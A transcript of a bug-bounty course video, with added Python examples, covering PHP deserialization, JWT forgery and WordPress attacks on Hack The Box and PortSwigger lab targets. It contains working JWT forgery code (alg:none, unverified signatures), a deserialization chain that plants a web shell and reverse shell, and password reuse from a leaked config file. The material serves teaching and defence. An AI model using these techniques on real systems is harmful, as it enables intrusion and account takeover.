has worked for you. And one of the other things that I didn't understand, and I don't understand still, so if you know PHP you might understand this better than I do: I have no idea why this says we have an integer of zero in order to get this exploit to work. This is not how I solved it, and I honestly don't have any idea why this access token is an i:0, but it does work, and the way I did it ended up working. So if you come over here and you change this to a zero with the Boolean, you're going to get this error, and then if you come in here and you solve it the way the solution says, with the integer of zero, apply the changes, you can send it, it works this way as well, and this cookie works. But, just being honest, I don't know why this works. My version makes sense to me because I have the access token and I'm just going to say that it's true that I have access to wherever I want to go, and I send it and it works. So if you know why this works with an integer you can feel free to leave a comment down below, because I'm really interested; I don't actually know. I actually Googled to try and figure out why this works with an integer and I couldn't find anything. So with that we will move on into the next vulnerability and keep going.

Okay, so now that we have looked at the insecure deserialization examples, we're going to come back to the flowchart. So now, if you remember, the object right here: we have our object, which is the waiter, and it is carrying the plate, and on the plate we have a username, which is Peter, and we have the access token right here. And so we have an object, we have a string and another string right here, and it says that this is also carrying a string, and then we have our Boolean, which is going to be true, which allows us to log in as the administrator. So now when you see something like this you should be able to understand what's going on, at least without it being really, really complicated. So here's the flowchart once again; this is how the
insecure deserialization works. I hope going from the beginning of this flowchart to now it all makes sense and you can understand what is going on. I'll see you in the next vulnerability.

Okay, so as we move into this next section we're going to be dealing with cookies and auth tokens, so I decided to go ahead and do the first half of the box Luke on Hack The Box. It's going to be dealing with a JSON Web Token, and I decided to show you this because I wanted you to see walking through the process of finding a token and changing it, and just how to understand what is going on. And then after we look at this box I'm going to set you loose on the two labs and you'll be able to practice manipulating these tokens on your own, and then we'll do walkthroughs with those as well. I thought it'd actually be helpful to go through the first half of the box Luke so that you could see a little bit of the enumeration, and I've had a few people asking to do more with APIs, and this box will actually show you how you can communicate with an API. I'm going to show you with the actual command line as well as enumerating an API with Burp, and so we'll go ahead and jump into this.

All right, I have already set up the box and I have it running, so we should be able to ping it; the IP address is .137, and we can see it's a Linux box right here, and it is all up and running and it is ready for some enumeration. We can run an nmap scan like this, and so we can go ahead and run this nmap scan, and we can see port 80 comes back really quick, so we can run gobuster, or we can try and use ffuf on this box, and we will use a directory list; I imagine a small one would be just fine, but we'll use the medium one just to make sure we're able to find everything that we need. And I forgot to change the IP address here, so we'll fuzz this while our nmap scan runs. So we've got .137 and we'll go ahead and send this on its way. We can actually come out to the IP address by typing in 10.10.10.137, since we know port 80 is open,
and we are brought to a web page like this. We can click around, see what's going on; you guys know I like to view the page source, I like to look at a lot of the hrefs and see what's in here. I wonder if it has a login in here... nope. And we can come back and see if ffuf has found anything. We got member, which was a redirect; we can check that out, see where it redirects to, and it doesn't tell us anything. And we can check: our nmap scan is still going; we have port 21. If this was a penetration testing course I would go out and check port 21 and FTP, but because it is not, I'm going to let these scans run and I'll bring you back once they have finished, since it seems to be taking longer than I anticipated.

So what we're going to do is we're going to check out gobuster, because I like to use gobuster for when I need to run an extension such as PHP, and ffuf does not allow me to do this. So what we're going to do is come back over here and we're going to run our gobuster, as well as ffuf, with the extension PHP, because this wasn't working for us, and we have a bunch of stuff coming back. So we can check out the login page. This usually is not going to work in a bug bounty program, but you can type in something like admin/admin, and it doesn't work. And so you can try default credentials and see if it works; usually there will be like a "made by" down here, but there doesn't seem to be, so we can't check for any default credentials on this page. We have a config.php, which is always a good thing to look at, especially when you have code execution on a box, because it will often pull down the username to the database, which is root, and we have a password as well. And one thing you should know by now, especially if you're in an intermediate course, is that people reuse their passwords, so we can copy this password. And we'll check our nmap scan; it has not told us, but it will tell us when it is done, that there is a port 3000. But before that, you could come back to this login
page right here and try and log in with root and that password we just copied to see if it would work, and it doesn't. And we could try admin with that password to see if it works, and it doesn't; you could also try administrator or other things like that. But we're going to go ahead and open a new tab, and before we mess with this new tab let's go and check port 3000, and we find that we are getting back JSON, and this is an API. So we are going to see what we can figure out. It says an auth token is not supplied, and we can curl this and see what happens and see if we can log in, because that is how we're going to get this auth token. So we can come over here and type in curl, and we're going to use a POST, and then we will go http:// and the IP address 10.10.10.137, and we're on port 3000, and we want to log in, and I can show you this right here: if we go /login. And the way you would find this login page is by fuzzing the API, which I showed in the beginner bug bounty course. So we know that we need to authenticate, because that's what it tells us, and we need this login page right here, and we need to pass in some parameters, which is going to be our username, so we'll go username, and we were told the username root; we can try this because that's what we saw on the config.php, and we'll need a password as well, and we can try the password that we found, and then we can close all this off and send it. And it tells us forbidden; it does not work, we're not able to curl it. So you could come over here and try admin like we tried before, and I spelled admin wrong, and we get a token in return, which is what we needed. So now what I would do is come back here like this: we're going to go to Burp and we're going to intercept this request, we'll send this to Repeater, and we can let that go. If we send this it tells us... let's try /login and send this, okay, and we get an OK back and it tells us we need to authenticate. Now what we need to do
is create a token, and so we'll need an authorization token, so we can go Authorization and then we'll use a Bearer, and then we're going to paste in our token right here, and you can nice and easily highlight to see what's going on here. So because this is a JSON token we have this right here, and this is going to decode this for us over here in our Inspector, and if yours is closed you can open it up, and we can see that this is just telling you it's a token; it looks like it's SHA-256 and this is the algorithm for it, so you'll see this again later. And so this is about the token, and then this second part is going to hold the information inside the token: we have the username admin, I think this is when it was created, I think this is the time that it would expire, and this right here would be the signing key. And now we should be able to manipulate this. We'll send it and it says we need to authenticate, so what we can do is come back to our terminal, and it says we have this token right here on the login page, so go back to Burp; we have the login, we have the Bearer, and I had to mess with my Authorization here to get this to go through. We now have our JSON key right here with our username and our shared key right here. So now that we have this, we should be able to start enumerating the endpoints of the API, and we can check out, if you remember over here, where did we run that... over here we have all these different things. And as we enumerate these endpoints one of the first places we should check is something like users, and we can send this, and it says we get the users back on the box. And because we have this right here, and because we now have control over what is going on, we can go users and then we could try and see if maybe there is an endpoint with this person, so we can copy this, paste it in, send it, and we now have a password for this user. And we can also go back and maybe see if this person has a password.
We can copy it... I guess we don't really need to copy it, I could just type it out, and send it, and we have their password as well. And with these usernames you could go out and try and log in to the actual web page and see if you can figure out how to get remote code execution, but this is the direction of the box; now we're not actually trying to get remote code execution. What I wanted to show you was these auth tokens and what you can do with them. So now we're going to come over here to our PortSwigger application here, where we have the free labs to practice, and we're going to go all the way to the bottom, because that's where these are located, and I think with what I just showed you, you should be able to solve this first lab all on your own. So if you would like to go and give this a try then you can do that, and if not, we'll go ahead and walk through it.

All right, so let's go ahead and read what we are supposed to do. It tells us this lab uses a JSON Web Token based mechanism for handling sessions; due to implementation flaws, the server doesn't verify the signature of any of the tokens that it receives. To solve the lab we need to gain access to the admin panel located right here, then delete the user Carlos. So I've gone ahead and clicked access the lab; we can come open this up, we are told we have the good old same username that we have been using, and we can log in. We'll log in just like normal, we can come over to Burp and we will grab the proxy, and we can refresh this page and we see our cookie session right here. We'll send this over to Repeater, we can turn that off, and now we can look at this token right here. We have this right here, we have the decoded portion of the cookie, and then we can check this out, and it tells us right here it was issued by PortSwigger and we are signed in as this user. So we'll change this to admin, we can apply changes, and now let's check and see if we can go to the admin panel, and it says "my account", so it looks like we are able to go
to the my account admin. So actually let's copy this, paste it in right here, delete that, send it: not found. Follow the redirect; where does it send us to? It tells us we need to log in, so that did not work. Let's try it again: let's go my account; it tells us we are still logged in. So let's grab this again right here; we're told that we need to go to the /admin, and then instructions. So we'll come back to this, see what we can do with this token. What we needed... was it admin, or maybe it was administrator, like this? We can go to the administrator, sign in as... we'll try and sign in as the administrator, apply changes, and now we need to go to the admin directory, and this already looks different: we have the users right here. So if we wanted to delete the user we could just copy this right here, and I think it should delete him. So if we send this, that does not work, so what we'll do is we'll just grab this entire token right here and we will copy it, come over here, and we'll just put it in place of that one, forward, turn the Interceptor off, and it tells us that we have solved the lab. I guess because we had the Interceptor on when we sent the request right here to delete Carlos, it didn't refresh the page because the Interceptor was on, so it went ahead and deleted the user for us. So that is one way to use these tokens, and they might be a little bit difficult in the beginning, but I really love this Interceptor over here that just decodes stuff for you. Otherwise you can try and decode this stuff by copying it like this, and you can come over to your terminal and you can go echo -n, just like this, and then you would just paste in the token that you wanted to decode, pipe, and then we go base64 -d, and that will decode it for us. You could also just come over to the Decoder, paste that in and decode as base64, and it'll tell you over here as well. So those are different ways to look at these cookies. I'm actually curious now; this leaves it all as a jumbled mess, but I am curious if the Decoder can
figure this out. And I accidentally copied it; we'll recopy this, send this over here, and it does get some of it right here. If you didn't know that it was separated by the periods, you could have brought it over here to the Decoder and you could figure out what's going on. It's not really that easy to read, but you can see that we got the administrator right here and we were issued by PortSwigger, so I mean you could have figured it out. But that is this challenge.

There is another one right here that we are going to walk through, so if you would like to open this one up, there is a little more to it. I'm not sure you'll be able to figure this one out completely on your own, but you can go ahead and play around with it and see if you can figure it out, and we'll go ahead and I'll open it up and then we will solve it. I have opened up the lab right here and we are brought to this page. The instructions are pretty much the exact same: we need to make it to this panel, we log in as this person, and we delete this user. So we can come over here, go to my account, we'll get logged in, and then we'll intercept the request: log in, don't save, we are logged in. So we'll go ahead and intercept the request, send to Repeater, we can shut that off, come over to Repeater, and we can do the exact same thing we had just done before. And we're told right here that it's using SHA-256 as the encryption, which I'm guessing is going to be for our session key right here, and so what we can do is come back up here and we can change this to none, and then we can delete our session key, highlight this, and we are supposed to be the administrator this time; we learned last time that it is not admin. We can apply the changes, and we'll come back over here and see if we can go /admin, and we can send this; it says we are unauthorized. Let's try and look at this again; I did not apply the changes right here, so we can say none, apply, send this, and we have made it.
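As an added example (not code from the course or from PortSwigger; standard library only, no PyJWT), here is what the two JWT labs above look like in code: decoding the three dot-separated segments, the "edit the claims and keep the old signature" forgery from the first lab, the alg:none forgery from the second lab, and two verifiers side by side. verify_broken() is the shape of the bug in the second lab, where the server reads the algorithm out of the attacker-controlled header; verify_fixed() keeps a server-side allowlist of one algorithm and never trusts the header. KEY and the sample claims are constructed for the demo; on a real target the signing key is what you do not have, which is exactly why the two forgeries matter. The b64url_decode() padding fix is the reason the raw token looked like a jumbled mess in the Decoder: JWT segments are base64url without the trailing = characters.

```python
"""JWT inspection and the two forgeries from the PortSwigger labs. Added example,
not from the course; stdlib only, no PyJWT. KEY and the sample claims are
constructed. verify_broken() mirrors lab 2 (the header's alg is trusted);
verify_fixed() is the shape a server should have.
"""
import base64
import hashlib
import hmac
import json

KEY = b"constructed-demo-secret"   # in real life the server's secret, unknown to you


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # JWT segments drop the '=' padding; base64 -d wants it back.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def _hs256(signing_input: str, key: bytes) -> str:
    return b64url_encode(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())


def decode_jwt(token: str):
    """Header and payload as dicts. No signature check: inspection only."""
    header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))


def sign_hs256(payload: dict, key: bytes) -> str:
    """What the server does at login: HS256 over header.payload."""
    signing_input = _segment({"alg": "HS256", "typ": "JWT"}) + "." + _segment(payload)
    return signing_input + "." + _hs256(signing_input, key)


def forge_unverified(token: str, **changes) -> str:
    """Lab 1: the server never checks the signature, so edit claims and keep the old one."""
    header, payload = decode_jwt(token)
    payload.update(changes)
    return _segment(header) + "." + _segment(payload) + "." + token.split(".")[2]


def forge_none(token: str, **changes) -> str:
    """Lab 2: set alg to none and send an empty signature (the trailing dot stays)."""
    header, payload = decode_jwt(token)
    header["alg"] = "none"
    payload.update(changes)
    return _segment(header) + "." + _segment(payload) + "."


def verify_broken(token: str, key: bytes):
    """Honours the alg from the attacker-controlled header. Returns claims or None."""
    header_b64, payload_b64, sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":                       # the bug: no signature needed
        return json.loads(b64url_decode(payload_b64))
    if hmac.compare_digest(_hs256(header_b64 + "." + payload_b64, key), sig):
        return json.loads(b64url_decode(payload_b64))
    return None


def verify_fixed(token: str, key: bytes):
    """Server-side allowlist of one algorithm; the header is data, not configuration."""
    header_b64, payload_b64, sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None
    if not hmac.compare_digest(_hs256(header_b64 + "." + payload_b64, key), sig):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    token = sign_hs256({"iss": "portswigger", "sub": "wiener"}, KEY)
    print(decode_jwt(token))
    print(verify_broken(forge_none(token, sub="administrator"), KEY))   # claims: accepted
    print(verify_fixed(forge_none(token, sub="administrator"), KEY))    # None: rejected
```

When you are testing a live program, the quick checks are the two forgeries in this order: change a claim and resend with the original signature (no verification at all), then change alg to none with an empty signature. Try "None", "NONE" and "nOnE" as well, since some libraries only blocklist the lowercase spelling.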
From here we know what we need to do, with highlighting this and going over here and trying to delete it, but I want to try this a little different this time. So I want to copy this token and I want to put it in directly myself and see if I can make it over this way. I think it should work; try this a little different... and it works, so we can come over here and delete the user this way, and you can put the session token in right here. So these are a few different ways you can bypass authentication through tokens and session cookies. You will just have to play around with these as you find them on live programs; they're just not always going to be really straightforward. So what you could do is look for what uses a period as a separator inside of a cookie or inside of a session token, and these are things you're just going to get used to over time: seeing and not understanding what it is, and then looking it up. This is also one reason it would be great for you to read the Web Hacker's Handbook and other web application penetration testing books, or even Hacktivity, because you're going to see things like this and you'll be like, what is this period, what is going on right here? And as you read you will learn how to recognize these different things. It's okay if you didn't recognize them this time; I bet you will recognize it the next time you come across it. So with that we will continue on.

Okay, I decided to include this little section right here on attacking WordPress websites, because to my surprise, the more I am in the web application testing world, I am surprised at how many people use WordPress. And even if they don't use it on their main site, there will be subdomains, or sometimes they'll have other domains or subdomains that are also in scope, that will have WordPress, especially if they have forums or a blog. So WordPress is something that you should be aware of and know how to enumerate and attack it.
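Before the walkthroughs, here is the first-pass WordPress enumeration as an added example (not code from the course; the real boxes are walked through by hand below). It checks the standard WordPress paths for a login form, XML-RPC, the REST users endpoint and the stock readme, reads the version out of the generator meta tag, and pulls usernames from two independent sources: the /wp-json/wp/v2/users listing and the ?author=N redirect, which leaks the author slug in the Location header even on sites that have blocked the REST endpoint. fake_fetch() and its canned responses are constructed for a made-up blog.example host so the block runs offline; on a lab box you would pass in a wrapper around requests.get() that returns (status, headers, body) and does not follow redirects.

```python
"""First-pass WordPress enumeration, scripted. Added example, not from the course.
fake_fetch() returns constructed responses for a made-up blog so this runs offline;
the paths are standard WordPress endpoints. Point enumerate_wp() at a real
fetch(url) -> (status, headers, body) wrapper (redirects NOT followed) on a lab box.
"""
import json
import re
from typing import Callable, Dict, Tuple
from urllib.parse import urlsplit

Response = Tuple[int, Dict[str, str], str]
BASE = "http://blog.example"   # hypothetical host; real targets need an /etc/hosts entry

# Constructed canned responses keyed by path (plus query string).
_CANNED = {
    "/": (200, {}, '<meta name="generator" content="WordPress 5.6" />'),
    "/wp-login.php": (200, {}, '<form name="loginform" id="loginform">'),
    "/xmlrpc.php": (405, {}, "XML-RPC server accepts POST requests only."),
    "/wp-json/wp/v2/users": (200, {}, json.dumps([{"id": 1, "slug": "protagonist"},
                                                    {"id": 2, "slug": "neil"}])),
    "/readme.html": (404, {}, ""),
    "/?author=1": (301, {"Location": BASE + "/author/protagonist/"}, ""),
    "/?author=2": (301, {"Location": BASE + "/author/neil/"}, ""),
}


def fake_fetch(url: str) -> Response:
    """Stand-in for an HTTP client: look the path up in the canned table."""
    parts = urlsplit(url)
    key = parts.path + ("?" + parts.query if parts.query else "")
    return _CANNED.get(key, (404, {}, ""))


# path -> why a tester cares that it is reachable
ENDPOINTS = [
    ("/wp-login.php", "login form (password spraying, user enumeration via error text)"),
    ("/xmlrpc.php", "XML-RPC reachable (system.multicall brute force, pingback SSRF)"),
    ("/wp-json/wp/v2/users", "REST API lists users"),
    ("/readme.html", "stock readme discloses the WordPress version"),
]


def enumerate_wp(base: str, fetch: Callable[[str], Response], max_author_id: int = 5) -> dict:
    """Version, reachable endpoints, and usernames from two independent sources."""
    report = {"version": None, "endpoints": {}, "users": set()}

    status, _, body = fetch(base + "/")
    match = re.search(r'name="generator" content="WordPress ([\d.]+)"', body)
    if status == 200 and match:
        report["version"] = match.group(1)

    for path, why in ENDPOINTS:
        status, _, body = fetch(base + path)
        if status in (200, 405):          # GET on xmlrpc.php answers 405 but it is there
            report["endpoints"][path] = why

    # Source 1: the REST users endpoint, when it is not blocked.
    status, _, body = fetch(base + "/wp-json/wp/v2/users")
    if status == 200:
        try:
            report["users"].update(user["slug"] for user in json.loads(body))
        except (ValueError, KeyError, TypeError):
            pass                            # not the JSON list we expected; ignore

    # Source 2: ?author=N redirects to /author/<slug>/ even when REST is blocked.
    for author_id in range(1, max_author_id + 1):
        status, headers, _ = fetch(base + "/?author=%d" % author_id)
        match = re.search(r"/author/([^/]+)/?$", headers.get("Location", ""))
        if status in (301, 302) and match:
            report["users"].add(match.group(1))

    return report


if __name__ == "__main__":
    result = enumerate_wp(BASE, fake_fetch)
    print("version:", result["version"])
    print("users:", sorted(result["users"]))
    for path, why in result["endpoints"].items():
        print(path, "->", why)
```

The author-ID loop is the one to remember: it is passive (a handful of GETs), it is in scope on almost any program, and the usernames it gives you are what wpscan and a login brute force are built on. The REST listing is the same data when the site has not disabled it.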
And so we're going to do a few Hack The Box WordPress walkthroughs now, just until we get remote code execution or find vulnerable files, so that way you can see how you should attack WordPress. WordPress is becoming more common, so I decided to include this in here because I don't think a lot of people in the bug bounty world attack WordPress the way a penetration tester would. So we're going to look at these from a penetration tester's perspective and how you would go about attacking them, but also along the way you can look for bugs as you enumerate WordPress sites. So let's go ahead and jump into this. All right, I have spun up the box Tenet for us to walk through. We're going to be doing two different boxes that have to do with WordPress, and I think this is something that you should really know well because you're definitely going to see these in CTFs as well as in bug bounty programs. A lot of bug bounty programs, you'll notice, will actually put the blog or some kind of forum site in the not-eligible category or out of scope, which really is a mistake because a lot of WordPress sites actually do have vulnerabilities in them, and you're going to see them a lot in CTFs, and we're going to cover a couple of those now. So I have already started the server, so we are going to be at IP 10.10.10.223, and then we can come here and we're brought to this default page. One of the things we should always do is try and run ffuf or gobuster. I'm going to use ffuf because it is already set up here for me, so we'll just change this to... actually, because this is going to be a WordPress site, we're going to run gobuster because we will want to have this extension for the PHP right here. So we can come back here and set this up, .223, and let that run. All right, so I got gobuster working. It turns out that it wasn't working because I had been disconnected from the box, but now it is up and going, and we see that there is a /wordpress, so we can come up here,
type in /wordpress, and see what we come across. We come to this page right here; we can view page source and see what is in here, and there is an href to this tenet.htb. If you're familiar with Hack The Box, then you know that you frequently have to add things to your /etc/hosts file. The IP address is 10.10.10.223 and it is tenet.htb, so now we should be able to save this and browse out to this page, tenet.htb. I want to go here, and it loads this page for us. Now one of the first things you're going to do anytime you come to a WordPress page, or a blog page in general, is just look at these posts here, and you can see you have protagonist as an author, which could possibly be a user. We can look at this one, same user, same author, and we can look here, same author. There is a comment by Neil; you could put this in your back pocket as a potential user. And then it says, did you remove the sator.php file from the backup? I'm not really sure why somebody would have written this right here rather than let the person know elsewhere, but you could try and come in here and type in the sator.php and see if anything is there. It doesn't look like it, but you could come over to where we know we have this WordPress and we could say wp-login.php, and you could try and log in with admin:admin or admin:administrator. I think you actually can come over here and do an admin.php... nope. Let's see if it's just /admin, and there is this login page; it tells us it just redirected us here to the login page, so we're not able to do anything with this, and we'll just come back to that main page. We can come back over here to this; there was no sator.php, but we could try it over here, and we can run it, and it tells us that it's grabbing users from a text file, which would be interesting. I wonder if you can go users.txt... nothing. Let me go back, and it just tells us success; we're not able to actually grab any of those users. So he said it was from a backup file, and often when you see a backup file it's going
to be a .bak, and it works for us. So we can save that to our Downloads, and we can cd to Desktop. We can move... I'm not sure what that saved as; it saved as sator.bak. So we can come over here, move, and then we'll move this to the current working directory, which is going to be our Desktop. Now if we ls we have it right here, and we can cat that file out and look to see what's going on. Now when I saw this I had to go straight out to Google and look up serialization for PHP because I am not really familiar with it, and when you come out to Google and you just look up serialization for PHP, you can just click this top one, and when you look through here it looks really similar to what we just saw, and then it actually walks us through how this works. So when I saw this I was like, okay, this must be what is happening, and you're going to have a serialized object. And so you might even be able to go and type in object like this, and let's see what happens if we get it into a JSON. This is Stack Overflow, and you can just look through here; this is what I did to figure this out, remembering that you are going to have to use your Google skills. This looks even more like what we just saw right here, so we know we're going to have to do something along these lines. We have it getting arepo, and then it has this unserialize on the input being called, so what we can do is just grab this right here and we can make our own serialized object. So we'll do this here: we'll cd into the Desktop, and we'll get it, and we'll call it mine.php, and now we will change this to fit our needs. So instead of going users.txt we'll go pone.php; we can leave this because this is going to be our object, and then inside the data we can put in our little reverse shell that we have seen earlier. So we'll grab a PHP one, and that will do a web shell first, and then we'll do a reverse shell to make sure that it works for remote code execution. We can just grab this same one we've been using
throughout this course. Where did my text file go? Right here, and we can just paste this in, and now we can delete this, delete this extra line here, and up here we're going to say mine equals new, and then I'll just copy this so I don't have any typo, and this looks like it should work. Let's try it real quick, so we can just say php mine.php, and it tells us we have a syntax error at the cmd, so we'll come back inside here. Okay, and thanks to the magic of video editing and much debugging, I finally got this to work. I had left in here the public function to update the database, and I had spelled serialize wrong, which took a little while for me to figure out what was wrong, but now we get this output, and this looks really familiar to what we have just gone through with our JWT tokens. So now if we copy this string right here and we come back to our page, we should be able to enter it in right here and pull down a web shell. So if you remember, from this right here we have this arepo being called, so we can come over here and add this in by deleting the .bak, add in a parameter, and we can say arepo equals and then paste in the serialized object that we just made. It tells us that it has added it, and now we should be able to come to our cmd and see if we have code execution on the box. So let's give this a try: delete all of that and say... what did we name it? I think we named it mine.php... so we named it pone.php, so we can come up here and say pone.php?cmd=whoami, and it tells us we are www-data. So now we should be able to get a reverse shell on this, so we can come back to our reverse shell cheat sheet; since we know this is running PHP we can try this with a PHP one. We can paste this in; my IP address is 10.10.14.
7, and we'll go on port 4444, and we'll go /bin/bash, and we can set up a netcat listener just like this. We're also going to grab this in Burp just in case it doesn't work; we'll send to Repeater, we can turn that off, and it doesn't work. So we can come back to Burp here, and if we send, it tells us that it went through really quickly, and it turns out that I am dash seven, and we send it and we get a callback. So I had my IP address wrong that entire time that I was trying to get that to work, so now I actually want to go back and try my PHP shell and see if that works. Where is my PHP? Come back over here, paste that in, one two three four, this is a seven, 14, 10, grab all of this, URL encode it, kill this shell, try a new one, send, and the PHP one works also. So that was a bit of a workaround, but I think it'll be helpful for you to see one more WordPress box, just to see that the enumeration process for WordPress is going to be a little different, and to know that you're going to be looking at everything in PHP. So I wanted to show you this one because it just came off of what we saw with a serialized object like this, and I thought it'd be helpful to see how it would work with WordPress, with PHP, and with that we will go ahead and attack another WordPress box. Okay, so I've gone ahead and run an nmap scan, and remember, if you run an nmap scan, to do so just on the common ports or the most common ports, because if you were doing a bug bounty hunt you don't really want to just be banging on their door looking for a bunch of open ports; but if you're doing a penetration test or some kind of CTF, then you can scan all ports. I've scanned all ports here, but just remember, if you're bug bounty hunting, to only scan the common ports, and if you are scanning quite a few ports, maybe slow down the nmap scan. With that said, we have three ports open: port 22, which is SSH, port 80, HTTP, and then we have MySQL running on
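For the serialized object the author had to look up on the first box, here is an added Python example (not the course's code and not the box's files) that parses PHP serialize() output and flags request parameters carrying an O: entry, the shape unserialize() turns into an object of the client's choosing. The class name Repo, the arepo parameter and the property values are constructed to resemble the walkthrough.

```python
"""Parser and detection for PHP serialize() data. Added example, not the course's code.
SAMPLE_PARAMS is constructed to resemble the walkthrough; it is not the box's real data."""
from dataclasses import dataclass, field


@dataclass
class PHPObject:
    """An O:... entry: class name plus its properties, in declaration order."""
    cls: str
    props: dict = field(default_factory=dict)


class PHPUnserializeError(ValueError):
    pass


def parse_php_serialized(data: str):
    """Parse one complete PHP-serialized value; raises on malformed or trailing input."""
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise PHPUnserializeError(f"trailing data at offset {pos}")
    return value


def _expect(data, pos, literal):
    if not data.startswith(literal, pos):
        raise PHPUnserializeError(f"expected {literal!r} at offset {pos}")
    return pos + len(literal)


def _read_until(data, pos, stop):
    end = data.find(stop, pos)
    if end < 0:
        raise PHPUnserializeError(f"unterminated field at offset {pos}")
    return data[pos:end], end + 1


def _read_quoted(data, pos, length):
    """Length-prefixed string body: "<bytes>"  (PHP counts bytes; ASCII assumed here)."""
    pos = _expect(data, pos, '"')
    text = data[pos:pos + length]
    if len(text) != length:
        raise PHPUnserializeError("string shorter than its declared length")
    return text, _expect(data, pos + length, '"')


def _read_pairs(data, pos, count, sink):
    """{key;value;...} bodies shared by arrays (a:) and objects (O:)."""
    pos = _expect(data, pos, "{")
    for _ in range(count):
        key, pos = _parse(data, pos)
        val, pos = _parse(data, pos)
        sink[key] = val
    return _expect(data, pos, "}")


def _parse(data, pos):
    tag = data[pos:pos + 1]
    if tag == "N":                      # N;
        return None, _expect(data, pos, "N;")
    if tag in ("i", "b", "d"):          # i:7;  b:1;  d:3.14;
        raw, pos = _read_until(data, pos + 2, ";")
        return {"i": int, "b": lambda r: r == "1", "d": float}[tag](raw), pos
    if tag == "s":                      # s:8:"pone.php";
        length, pos = _read_until(data, pos + 2, ":")
        text, pos = _read_quoted(data, pos, int(length))
        return text, _expect(data, pos, ";")
    if tag == "a":                      # a:<n>:{key;value;...}
        count, pos = _read_until(data, pos + 2, ":")
        items = {}
        return items, _read_pairs(data, pos, int(count), items)
    if tag == "O":                      # O:4:"Repo":1:{s:4:"file";s:8:"pone.php";}
        clen, pos = _read_until(data, pos + 2, ":")
        cls, pos = _read_quoted(data, pos, int(clen))
        count, pos = _read_until(data, _expect(data, pos, ":"), ":")
        obj = PHPObject(cls)
        return obj, _read_pairs(data, pos, int(count), obj.props)
    raise PHPUnserializeError(f"unknown type tag {tag!r} at offset {pos}")


def object_classes(value) -> list:
    """Class names of every object nested anywhere inside a parsed value."""
    found = []
    if isinstance(value, PHPObject):
        found.append(value.cls)
        value = value.props
    if isinstance(value, dict):
        for child in value.values():
            found.extend(object_classes(child))
    return found


def flag_unserialize_params(params: dict) -> dict:
    """Detection: a scalar like s:4:"main"; is ordinary data, but an O: entry means
    unserialize() will instantiate a class the client named, which is what to alert on."""
    flagged = {}
    for name, raw in params.items():
        try:
            classes = object_classes(parse_php_serialized(raw))
        except ValueError:              # PHPUnserializeError or a bad int(): not serialized data
            continue
        if classes:
            flagged[name] = classes
    return flagged


# Constructed request parameters modelled on the walkthrough (not the box's real data)
SAMPLE_PARAMS = {
    "arepo": 'O:4:"Repo":1:{s:4:"file";s:8:"pone.php";}',
    "page": "main",
    "ids": "a:2:{i:0;i:1;i:1;i:2;}",
}

if __name__ == "__main__":
    print(parse_php_serialized(SAMPLE_PARAMS["arepo"]))   # PHPObject(cls='Repo', props={'file': 'pone.php'})
    print(flag_unserialize_params(SAMPLE_PARAMS))         # {'arepo': ['Repo']}
```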
3306. So the first thing to do is just come out to the HTTP server and see what is here, and it tells us there's an issue tracker until it's set up. We can check out these links right here and see if they take us anywhere, and it tells us right here it's taking us to spectra.htb, so we probably need to add this to our hosts file. So we can sudo gedit our /etc/hosts, and now that that's added we can try and come back here and see if this will load for us, and go and see if we get anything different this time, and it looks like it's working; I must have spelled it wrong. So it tells us there's an error establishing a database connection, so that doesn't work. Did we test this one? And we get a WordPress site right here, and this is a basic WordPress site. We are told that it is up to date, it's powered by WordPress, and one of the things to look at is there is a user, which would be administrator. See who commented, and we don't have anything; it just says a WordPress commenter, so there's probably not another user there. We have this right here, this p=1; it looks like that could potentially be different users, so you could come up here and just try and enumerate this. It'd be easier to send this over to Burp and try and do this. Now it says we have page IDs; we can look for different pages, but I'm not going to run down this road just yet. While we're on a WordPress page, one of the best things to do, really on any kind of page, is to fuzz it, so we will do two different types of fuzzing. We will fuzz with the extension PHP because we are on a WordPress page, so we can come back over here, and it is .229, and we can run this. Actually, I'm not sure that will work because we are on a virtual host, so we'll go spectra.htb and see if that fuzzes, and it says that's working. So we have this main, and then also I want to run ffuf and see if we can pull down anything else right here on this server. We actually want to run this on spectra.htb, and we've pulled down main
and testing, so we can come over here and just type in testing, and we are brought to a bunch of files. We've already been to index.php. One of the things you should always check for when you come to a page like this is when you see these config files: config is always a very yummy place to search for vulnerabilities. We can view page source; we know that when we see a blank page there might be some hidden files, and over here we see we have a database user and we have the database username. Now we saw on this nmap scan that MySQL was open, and you could try to log into MySQL, and the way we would go about this is typing in mysql, and we'll put in the host 10.10.10.229, and then the username was right here, devtest, so we would go devtest, and then the password, and then see what happens like this. We can copy-paste and see if it will let us log in, and it tells us we're not allowed to log in, and it looks like it's because our IP address here is not allowed to log in, which is fine; you probably have to be running on the local machine to log in. So what we can do is come back to this page right here, and we see that the admin is allowed to log in, so we have a wp-admin. So we can open a new tab, type in spectra.htb, come back over here, we can try and log in with the wp-admin, and that keeps sending me to... every time we type in this /wp-admin it keeps sending us to Google. So we're going to turn this off: we're going to come over here and say about:config, accept the risk, and we're going to go keyword and set this to false. Now that should be saved; you can close out of it, and now if we come back and type this in, it should stay on track, wp-admin, and it loads for us. Now if you remember we saw, I think it was, administrator like this, and then we can grab this password and see if maybe this person is reusing a password. Log in, and it tells us the administrator email verification; we can just say remind me later.
